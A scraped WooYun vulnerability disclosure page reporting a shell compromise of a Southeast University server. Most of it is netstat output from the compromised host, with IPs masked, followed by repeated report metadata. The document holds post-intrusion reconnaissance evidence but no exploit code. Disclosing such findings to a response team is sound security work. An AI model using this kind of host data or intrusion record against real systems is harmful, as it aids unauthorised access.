tcp        0      0 **.**.**.**:58568        **.**.**.**:3306         ESTABLISHED keepalive (6596.76/0/0)
tcp        0      0 **.**.**.**:44039        **.**.**.**:1521         TIME_WAIT   timewait (28.72/0/0)
tcp        0      0 **.**.**.**:45463        **.**.**.**:1433         TIME_WAIT   timewait (43.56/0/0)
tcp        0      0 **.**.**.**:44040        **.**.**.**:1521         TIME_WAIT   timewait (28.53/0/0)
tcp        0      0 **.**.**.**:58875        **.**.**.**:3306         ESTABLISHED keepalive (6822.66/0/0)
tcp        0      0 **.**.**.**:58867        **.**.**.**:3306         ESTABLISHED keepalive (6816.75/0/0)
tcp        0      0 **.**.**.**:40221        **.**.**.**:20000         ESTABLISHED keepalive (2779.68/0/0)
tcp        0      0 **.**.**.**:8080              **.**.**.**:50766             TIME_WAIT   timewait (13.58/0/0)
tcp        0      0 **.**.**.**:58622        **.**.**.**:3306         ESTABLISHED keepalive (6705.24/0/0)
tcp        0      0 **.**.**.**:8080              **.**.**.**:50778             TIME_WAIT   timewait (34.53/0/0)
tcp        0      0 **.**.**.**:44065        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:45462        **.**.**.**:1433         TIME_WAIT   timewait (43.55/0/0)
tcp        1      1 **.**.**.**:55835        **.**.**.**:80             LAST_ACK    on (0.93/1/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:38385             ESTABLISHED keepalive (5341.62/0/0)
tcp        0      0 **.**.**.**:44073        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:58660        **.**.**.**:3306         ESTABLISHED keepalive (6759.41/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59288             ESTABLISHED keepalive (6135.93/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:39546             ESTABLISHED keepalive (552.24/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:41680             ESTABLISHED keepalive (2262.36/0/0)
tcp        0      0 **.**.**.**:58553        **.**.**.**:3306         ESTABLISHED keepalive (6578.79/0/0)
tcp        0      0 **.**.**.**:50772             **.**.**.**:8080              TIME_WAIT   timewait (33.21/0/0)
tcp        0      0 **.**.**.**:56130             **.**.**.**:3306              ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:44063        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:44034        **.**.**.**:1521         TIME_WAIT   timewait (8.54/0/0)
tcp        0      0 **.**.**.**:51687        **.**.**.**:20000         ESTABLISHED keepalive (142.50/0/0)
tcp        0      0 **.**.**.**:45467        **.**.**.**:1433         TIME_WAIT   timewait (48.35/0/0)
tcp        0      0 **.**.**.**:58655        **.**.**.**:3306         ESTABLISHED keepalive (6741.35/0/0)
tcp        0      0 **.**.**.**:45465        **.**.**.**:1433         TIME_WAIT   timewait (48.34/0/0)
tcp        0      0 **.**.**.**:58865        **.**.**.**:3306         ESTABLISHED keepalive (6813.61/0/0)
tcp        0      0 **.**.**.**:44092        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:59277             **.**.**.**:3306              ESTABLISHED keepalive (6120.90/0/0)
tcp        0      0 **.**.**.**:44093        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:58905        **.**.**.**:3306         ESTABLISHED keepalive (6890.36/0/0)
tcp        0      0 **.**.**.**:58576        **.**.**.**:3306         ESTABLISHED keepalive (6621.73/0/0)
tcp        0      0 **.**.**.**:58623        **.**.**.**:3306         ESTABLISHED keepalive (6711.74/0/0)
tcp        0      0 **.**.**.**:44046        **.**.**.**:1521         TIME_WAIT   timewait (33.54/0/0)
tcp        0      0 **.**.**.**:58575        **.**.**.**:3306         ESTABLISHED keepalive (6611.74/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59244             ESTABLISHED keepalive (6062.45/0/0)
tcp        0      0 **.**.**.**:58640        **.**.**.**:3306         ESTABLISHED keepalive (6732.31/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59418             ESTABLISHED keepalive (6355.89/0/0)
tcp        0      0 **.**.**.**:44032        **.**.**.**:1521         TIME_WAIT   timewait (8.51/0/0)
tcp        0      0 :::5989                     :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 :::8006                     :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 :::8041                     :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:8011       :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 :::111                      :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 :::8081                     :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 :::22                       :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 ::1:631                     :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 :::8001                     :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 :::51393                    :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:37019      ::ffff:**.**.**.**:3306       ESTABLISHED keepalive (1632.43/0/0)
tcp        0      0 ::ffff:**.**.**.**:39546      ::ffff:**.**.**.**:3306       ESTABLISHED keepalive (552.23/0/0)
tcp        0      0 ::ffff:**.**.**.**:59255      ::ffff:**.**.**.**:3306       ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:33836      ::ffff:**.**.**.**:55418      ESTABLISHED keepalive (6613.06/0/0)
tcp        0      0 ::ffff:**.**.**.**:34201 ::ffff:**.**.**.**:20000  ESTABLISHED keepalive (1928.01/0/0)
tcp        0      0 ::ffff:**.**.**.**:37017      ::ffff:**.**.**.**:3306       ESTABLISHED keepalive (1632.43/0/0)
tcp        0      0 ::ffff:**.**.**.**:38387      ::ffff:**.**.**.**:3306       ESTABLISHED keepalive (5341.61/0/0)
tcp        0      0 ::ffff:**.**.**.**:54355      ::ffff:**.**.**.**:3306       ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:39548      ::ffff:**.**.**.**:3306       ESTABLISHED keepalive (572.22/0/0)
tcp        0      0 ::ffff:**.**.**.**:59253      ::ffff:**.**.**.**:3306       ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:59244      ::ffff:**.**.**.**:3306       ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:38385      ::ffff:**.**.**.**:3306       ESTABLISHED keepalive (5341.61/0/0)
tcp        0      0 ::ffff:**.**.**.**:58614      ::ffff:**.**.**.**:46837      ESTABLISHED keepalive (3514.79/0/0)
tcp        0      0 ::ffff:**.**.**.**:59252      ::ffff:**.**.**.**:3306       ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:39547      ::ffff:**.**.**.**:3306       ESTABLISHED keepalive (552.22/0/0)
tcp        0      0 ::ffff:**.**.**.**:37016      ::ffff:**.**.**.**:3306       ESTABLISHED keepalive (1622.43/0/0)
tcp        0      0 ::ffff:**.**.**.**:59245      ::ffff:**.**.**.**:3306       ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:38386      ::ffff:**.**.**.**:3306       ESTABLISHED keepalive (5341.60/0/0)
tcp        0      0 ::ffff:**.**.**.**:59251      ::ffff:**.**.**.**:3306       ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:41683      ::ffff:**.**.**.**:3306       ESTABLISHED keepalive (2272.34/0/0)
tcp        0      0 ::ffff:**.**.**.**:46837      ::ffff:**.**.**.**:58614      ESTABLISHED keepalive (3514.79/0/0)
tcp        0      0 ::ffff:**.**.**.**:41681      ::ffff:**.**.**.**:3306       ESTABLISHED keepalive (2272.34/0/0)
tcp        0      0 ::ffff:**.**.**.**:41680      ::ffff:**.**.**.**:3306       ESTABLISHED keepalive (2262.34/0/0)
tcp        0      0 ::ffff:**.**.**.**:54354      ::ffff:**.**.**.**:3306       ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:38417 ::ffff:**.**.**.**:20000  ESTABLISHED keepalive (3976.01/0/0)
tcp        0      0 ::ffff:**.**.**.**:59254      ::ffff:**.**.**.**:3306       ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:59243      ::ffff:**.**.**.**:3306       ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:55418      ::ffff:**.**.**.**:33836      ESTABLISHED keepalive (6613.05/0/0)
udp        0      0 **.**.**.**:7500            **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:56668        **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:5353                **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:111                 **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:631                 **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:759                 **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:900                 **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:53128               **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:45588             **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:43449               **.**.**.**:*                               off (0.00/0/0)
udp        0      0 :::111                      :::*                                    off (0.00/0/0)
udp        0      0 :::759                      :::*                                    off (0.00/0/0)
udp        0      0 :::55217                    :::*                                    off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  16     [ ]         DGRAM                    12031  /dev/log
unix  2      [ ACC ]     STREAM     LISTENING     16290  /usr/local/mysql/mysql.sock
unix  2      [ ACC ]     STREAM     LISTENING     16885  /tmp/orbit-gdm/linc-e4e-0-7582b9f145193
unix  2      [ ACC ]     STREAM     LISTENING     13344  @/var/run/hald/dbus-972idtYzSp
unix  2      [ ACC ]     STREAM     LISTENING     16941  /tmp/orbit-gdm/linc-e52-0-7f7aad4b5b844
unix  2      [ ACC ]     STREAM     LISTENING     9097   @/com/ubuntu/upstart
unix  2      [ ACC ]     STREAM     LISTENING     13285  /var/run/cups/cups.sock
unix  2      [ ACC ]     STREAM     LISTENING     16202  @/tmp/dbus-7kYMVCBvFR
unix  2      [ ACC ]     STREAM     LISTENING     12643  /var/run/avahi-daemon/socket
unix  2      [ ACC ]     STREAM     LISTENING     13314  /var/run/acpid.socket
unix  2      [ ACC ]     STREAM     LISTENING     15789  @/tmp/.X11-unix/X0
unix  2      [ ]         DGRAM                    9270   @/org/kernel/udev/udevd
unix  2      [ ACC ]     STREAM     LISTENING     16248  @/tmp/gdm-session-qpOsjvVn
unix  2      [ ACC ]     STREAM     LISTENING     13714  /var/run/**.**.**.**m
unix  2      [ ACC ]     STREAM     LISTENING     16038  @/tmp/gdm-greeter-PZgmHazR
unix  2      [ ACC ]     STREAM     LISTENING     13810  /var/run/mcelog-client
unix  2      [ ACC ]     STREAM     LISTENING     13977  /var/run/abrt/abrt.socket
unix  2      [ ACC ]     STREAM     LISTENING     15790  /tmp/.X11-unix/X0
unix  2      [ ]         DGRAM                    13371  @/org/freedesktop/hal/udev_event
unix  2      [ ACC ]     STREAM     LISTENING     16278  /tmp/.ICE-unix/3609
unix  2      [ ACC ]     STREAM     LISTENING     12382  /var/run/rpcbind.sock
unix  2      [ ACC ]     STREAM     LISTENING     16344  /tmp/orbit-gdm/linc-e31-0-5f5e7963e188d
unix  2      [ ACC ]     STREAM     LISTENING     13349  @/var/run/hald/dbus-0OmUeizrwH
unix  2      [ ACC ]     STREAM     LISTENING     14610  /var/run/tog-pegasus/cimxml.socket
unix  2      [ ACC ]     STREAM     LISTENING     12524  /var/run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     16412  /tmp/orbit-gdm/linc-e19-0-58cf58cfe6536
unix  2      [ ACC ]     STREAM     LISTENING     16514  /tmp/orbit-gdm/linc-e42-0-6e6feb2c5aff7
unix  2      [ ACC ]     STREAM     LISTENING     16557  /tmp/orbit-gdm/linc-e45-0-3e2c139ec0532
unix  2      [ ACC ]     STREAM     LISTENING     16562  /tmp/orbit-gdm/linc-e41-0-3b7520e6c0817
unix  2      [ ACC ]     STREAM     LISTENING     16661  /tmp/orbit-gdm/linc-e4d-0-22570fcbb3d1
unix  2      [ ACC ]     STREAM     LISTENING     16846  /tmp/orbit-gdm/linc-e4f-0-24cf61943456c
unix  2      [ ACC ]     STREAM     LISTENING     16872  /tmp/orbit-gdm/linc-e51-0-6284666d3f0c5
unix  2      [ ACC ]     STREAM     LISTENING     16277  @/tmp/.ICE-unix/3609
unix  2      [ ]         STREAM     CONNECTED     78177721 
unix  3      [ ]         STREAM     CONNECTED     76939758 
unix  3      [ ]         STREAM     CONNECTED     76939757 
unix  3      [ ]         STREAM     CONNECTED     76939756 
unix  3      [ ]         STREAM     CONNECTED     76939755 
unix  3      [ ]         STREAM     CONNECTED     76939754 
unix  3      [ ]         STREAM     CONNECTED     76939753 
unix  3      [ ]         STREAM     CONNECTED     76939752 
unix  3      [ ]         STREAM     CONNECTED     76939751 
unix  2      [ ]         STREAM     CONNECTED     76598148 
unix  2      [ ]         STREAM     CONNECTED     76186105 
unix  3      [ ]         STREAM     CONNECTED     737917 
unix  3      [ ]         STREAM     CONNECTED     737916 
unix  3      [ ]         STREAM     CONNECTED     17227  /var/run/**.**.**.**m
unix  3      [ ]         STREAM     CONNECTED     17226  
unix  3      [ ]         STREAM     CONNECTED     17140  @/tmp/gdm-session-qpOsjvVn
unix  3      [ ]         STREAM     CONNECTED     17139  
unix  3      [ ]         STREAM     CONNECTED     17137  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     17136  
unix  3      [ ]         STREAM     CONNECTED     17107  @/tmp/gdm-session-qpOsjvVn
unix  3      [ ]         STREAM     CONNECTED     17106  
unix  3      [ ]         STREAM     CONNECTED     17104  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     17103  
unix  3      [ ]         STREAM     CONNECTED     17081  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     17080  
unix  2      [ ]         DGRAM                    17079  
unix  3      [ ]         STREAM     CONNECTED     17072  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     17071  
unix  3      [ ]         STREAM     CONNECTED     17070  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     17069  
unix  2      [ ]         DGRAM                    17049  
unix  3      [ ]         STREAM     CONNECTED     17043  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     17042  
unix  3      [ ]         STREAM     CONNECTED     17030  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     17029  
unix  2      [ ]         DGRAM                    17028  
unix  3      [ ]         STREAM     CONNECTED     17026  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     17025  
unix  3      [ ]         STREAM     CONNECTED     17014  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     17013  
unix  3      [ ]         STREAM     CONNECTED     16985  /tmp/orbit-gdm/linc-e52-0-7f7aad4b5b844
unix  3      [ ]         STREAM     CONNECTED     16984  
unix  3      [ ]         STREAM     CONNECTED     16982  /tmp/orbit-gdm/linc-e31-0-5f5e7963e188d
unix  3      [ ]         STREAM     CONNECTED     16981  
unix  3      [ ]         STREAM     CONNECTED     16980  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     16979  
unix  3      [ ]         STREAM     CONNECTED     16976  @/tmp/gdm-greeter-PZgmHazR
unix  3      [ ]         STREAM     CONNECTED     16975  
unix  3      [ ]         STREAM     CONNECTED     16948  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     16947  
unix  3      [ ]         STREAM     CONNECTED     16983  /tmp/orbit-gdm/linc-e52-0-7f7aad4b5b844
unix  3      [ ]         STREAM     CONNECTED     16946  
unix  3      [ ]         STREAM     CONNECTED     16940  /tmp/orbit-gdm/linc-e41-0-3b7520e6c0817
unix  3      [ ]         STREAM     CONNECTED     16939  
unix  3      [ ]         STREAM     CONNECTED     16938  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16937  
unix  3      [ ]         STREAM     CONNECTED     16915  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16914  
unix  3      [ ]         STREAM     CONNECTED     16913  /tmp/orbit-gdm/linc-e4e-0-7582b9f145193
unix  3      [ ]         STREAM     CONNECTED     16907  
unix  3      [ ]         STREAM     CONNECTED     16905  /tmp/orbit-gdm/linc-e31-0-5f5e7963e188d
unix  3      [ ]         STREAM     CONNECTED     16904  
unix  3      [ ]         STREAM     CONNECTED     16902  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16901  
unix  3      [ ]         STREAM     CONNECTED     16894  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     16893  
unix  3      [ ]         STREAM     CONNECTED     16906  /tmp/orbit-gdm/linc-e4e-0-7582b9f145193
unix  3      [ ]         STREAM     CONNECTED     16891  
unix  3      [ ]         STREAM     CONNECTED     16890  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16889  
unix  3      [ ]         STREAM     CONNECTED     16884  /tmp/orbit-gdm/linc-e41-0-3b7520e6c0817
unix  3      [ ]         STREAM     CONNECTED     16883  
unix  3      [ ]         STREAM     CONNECTED     16876  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16875  
unix  3      [ ]         STREAM     CONNECTED     17050  /tmp/orbit-gdm/linc-e51-0-6284666d3f0c5
unix  3      [ ]         STREAM     CONNECTED     16874  
unix  3      [ ]         STREAM     CONNECTED     16870  /tmp/orbit-gdm/linc-e41-0-3b7520e6c0817
unix  3      [ ]         STREAM     CONNECTED     16869  
unix  3      [ ]         STREAM     CONNECTED     16864  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16863  
unix  3      [ ]         STREAM     CONNECTED     16860  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16859  
unix  3      [ ]         STREAM     CONNECTED     16850  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16849  
unix  3      [ ]         STREAM     CONNECTED     17039  /tmp/orbit-gdm/linc-e4f-0-24cf61943456c
unix  3      [ ]         STREAM     CONNECTED     16848  
unix  3      [ ]         STREAM     CONNECTED     16845  /tmp/orbit-gdm/linc-e41-0-3b7520e6c0817
unix  3      [ ]         STREAM     CONNECTED     16844  
unix  3      [ ]         STREAM     CONNECTED     16843  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16842  
unix  3      [ ]         STREAM     CONNECTED     16839  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16838  
unix  3      [ ]         STREAM     CONNECTED     16738  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16737  
unix  3      [ ]         STREAM     CONNECTED     16673  @/tmp/.ICE-unix/3609
unix  3      [ ]         STREAM     CONNECTED     16672  
unix  3      [ ]         STREAM     CONNECTED     16671  /tmp/orbit-gdm/linc-e4d-0-22570fcbb3d1
unix  3      [ ]         STREAM     CONNECTED     16670  
unix  3      [ ]         STREAM     CONNECTED     16668  /tmp/orbit-gdm/linc-e31-0-5f5e7963e188d
unix  3      [ ]         STREAM     CONNECTED     16667  
unix  3      [ ]         STREAM     CONNECTED     16665  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     16664  
unix  3      [ ]         STREAM     CONNECTED     16669  /tmp/orbit-gdm/linc-e4d-0-22570fcbb3d1
unix  3      [ ]         STREAM     CONNECTED     16663  
unix  3      [ ]         STREAM     CONNECTED     16660  /tmp/orbit-gdm/linc-e41-0-3b7520e6c0817
unix  3      [ ]         STREAM     CONNECTED     16659  
unix  3      [ ]         STREAM     CONNECTED     16658  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16657  
unix  3      [ ]         STREAM     CONNECTED     16654  /tmp/orbit-gdm/linc-e19-0-58cf58cfe6536
unix  3      [ ]         STREAM     CONNECTED     16652  
unix  3      [ ]         STREAM     CONNECTED     16651  /tmp/orbit-gdm/linc-e41-0-3b7520e6c0817
unix  3      [ ]         STREAM     CONNECTED     16650  
unix  3      [ ]         STREAM     CONNECTED     16653  /tmp/orbit-gdm/linc-e42-0-6e6feb2c5aff7
unix  3      [ ]         STREAM     CONNECTED     16649  
unix  3      [ ]         STREAM     CONNECTED     16648  /tmp/orbit-gdm/linc-e41-0-3b7520e6c0817
unix  3      [ ]         STREAM     CONNECTED     16647  
unix  3      [ ]         STREAM     CONNECTED     16646  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16645  
unix  3      [ ]         STREAM     CONNECTED     16644  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16643  
unix  3      [ ]         STREAM     CONNECTED     16642  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16641  
unix  3      [ ]         STREAM     CONNECTED     16606  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     16605  
unix  3      [ ]         STREAM     CONNECTED     16600  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     16599  
unix  3      [ ]         STREAM     CONNECTED     16570  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     16569  
unix  3      [ ]         STREAM     CONNECTED     16568  /tmp/orbit-gdm/linc-e41-0-3b7520e6c0817
unix  3      [ ]         STREAM     CONNECTED     16567  
unix  3      [ ]         STREAM     CONNECTED     16565  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     16564  
unix  3      [ ]         STREAM     CONNECTED     16561  /tmp/orbit-gdm/linc-e45-0-3e2c139ec0532
unix  3      [ ]         STREAM     CONNECTED     16560  
unix  3      [ ]         STREAM     CONNECTED     16524  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16523  
unix  3      [ ]         STREAM     CONNECTED     16517  /tmp/orbit-gdm/linc-e42-0-6e6feb2c5aff7
unix  3      [ ]         STREAM     CONNECTED     16516  
unix  3      [ ]         STREAM     CONNECTED     16513  /tmp/orbit-gdm/linc-e31-0-5f5e7963e188d
unix  3      [ ]         STREAM     CONNECTED     16512  
unix  3      [ ]         STREAM     CONNECTED     16506  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     16505  
unix  3      [ ]         STREAM     CONNECTED     16503  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16502  
unix  3      [ ]         STREAM     CONNECTED     16415  /tmp/orbit-gdm/linc-e19-0-58cf58cfe6536
unix  3      [ ]         STREAM     CONNECTED     16414  
unix  3      [ ]         STREAM     CONNECTED     16411  /tmp/orbit-gdm/linc-e31-0-5f5e7963e188d
unix  3      [ ]         STREAM     CONNECTED     16410  
unix  3      [ ]         STREAM     CONNECTED     16406  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16405  
unix  3      [ ]         STREAM     CONNECTED     16347  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     16346  
unix  3      [ ]         STREAM     CONNECTED     16309  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16308  
unix  3      [ ]         STREAM     CONNECTED     16305  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16304  
unix  3      [ ]         STREAM     CONNECTED     16295  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16294  
unix  3      [ ]         STREAM     CONNECTED     16263  @/tmp/dbus-7kYMVCBvFR
unix  3      [ ]         STREAM     CONNECTED     16262  
unix  3      [ ]         STREAM     CONNECTED     16260  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16259  
unix  3      [ ]         STREAM     CONNECTED     16225  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16224  
unix  3      [ ]         STREAM     CONNECTED     16223  
unix  3      [ ]         STREAM     CONNECTED     16222  
unix  3      [ ]         STREAM     CONNECTED     16186  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16185  
unix  3      [ ]         STREAM     CONNECTED     16113  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16112  
unix  3      [ ]         STREAM     CONNECTED     16052  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16051  
unix  3      [ ]         STREAM     CONNECTED     16040  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16039  
unix  3      [ ]         STREAM     CONNECTED     15978  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     15958  
unix  3      [ ]         STREAM     CONNECTED     15957  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     15956  
unix  3      [ ]         STREAM     CONNECTED     15748  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     15747  
unix  3      [ ]         STREAM     CONNECTED     15677  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     15676  
unix  3      [ ]         STREAM     CONNECTED     14663  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     14662  
unix  3      [ ]         STREAM     CONNECTED     14557  
unix  3      [ ]         STREAM     CONNECTED     14556  
unix  2      [ ]         DGRAM                    14281  
unix  2      [ ]         DGRAM                    13979  
unix  2      [ ]         DGRAM                    13874  
unix  2      [ ]         DGRAM                    13807  
unix  2      [ ]         DGRAM                    13756  
unix  3      [ ]         STREAM     CONNECTED     13741  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     13740  
unix  2      [ ]         DGRAM                    13713  
unix  3      [ ]         STREAM     CONNECTED     13661  @/var/run/hald/dbus-972idtYzSp
unix  3      [ ]         STREAM     CONNECTED     13660  
unix  3      [ ]         STREAM     CONNECTED     13658  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     13657  
unix  3      [ ]         STREAM     CONNECTED     13647  /var/run/acpid.socket
unix  3      [ ]         STREAM     CONNECTED     13646  
unix  3      [ ]         STREAM     CONNECTED     13642  @/var/run/hald/dbus-972idtYzSp
unix  3      [ ]         STREAM     CONNECTED     13640  
unix  3      [ ]         STREAM     CONNECTED     13602  @/var/run/hald/dbus-972idtYzSp
unix  3      [ ]         STREAM     CONNECTED     13590  
unix  3      [ ]         STREAM     CONNECTED     13366  @/var/run/hald/dbus-0OmUeizrwH
unix  3      [ ]         STREAM     CONNECTED     13365  
unix  3      [ ]         STREAM     CONNECTED     13346  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     13345  
unix  2      [ ]         DGRAM                    13316  
unix  3      [ ]         STREAM     CONNECTED     13219  
unix  3      [ ]         STREAM     CONNECTED     13218  
unix  3      [ ]         STREAM     CONNECTED     13045  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     13044  
unix  2      [ ]         DGRAM                    12785  
unix  3      [ ]         STREAM     CONNECTED     12646  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     12645  
unix  3      [ ]         STREAM     CONNECTED     12640  
unix  3      [ ]         STREAM     CONNECTED     12639  
unix  2      [ ]         DGRAM                    12637  
unix  3      [ ]         STREAM     CONNECTED     12596  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     12595  
unix  2      [ ]         DGRAM                    12594  
unix  3      [ ]         STREAM     CONNECTED     12588  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     12583  
unix  3      [ ]         STREAM     CONNECTED     12580  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     12579  
unix  2      [ ]         DGRAM                    12575  
unix  3      [ ]         STREAM     CONNECTED     12536  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     12535  
unix  3      [ ]         STREAM     CONNECTED     12529  
unix  3      [ ]         STREAM     CONNECTED     12528  
unix  3      [ ]         DGRAM                    9286   
unix  3      [ ]         DGRAM                    9285   
[/usr/local/sh/]$
修复方案：

加强安全意识
版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

危害等级：中
漏洞Rank：6
确认时间：2015-12-17 16:17
厂商回复：

通知处理中
WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0160535

漏洞标题：东南大学某服务器getshell,众多站点系统沦陷

相关厂商：CCERT教育网应急响应组

漏洞作者：朱元璋

提交时间：2015-12-17 09:12

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0160535

漏洞标题：东南大学某服务器getshell,众多站点系统沦陷

相关厂商：CCERT教育网应急响应组

漏洞作者： 朱元璋

提交时间：2015-12-17 09:12

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

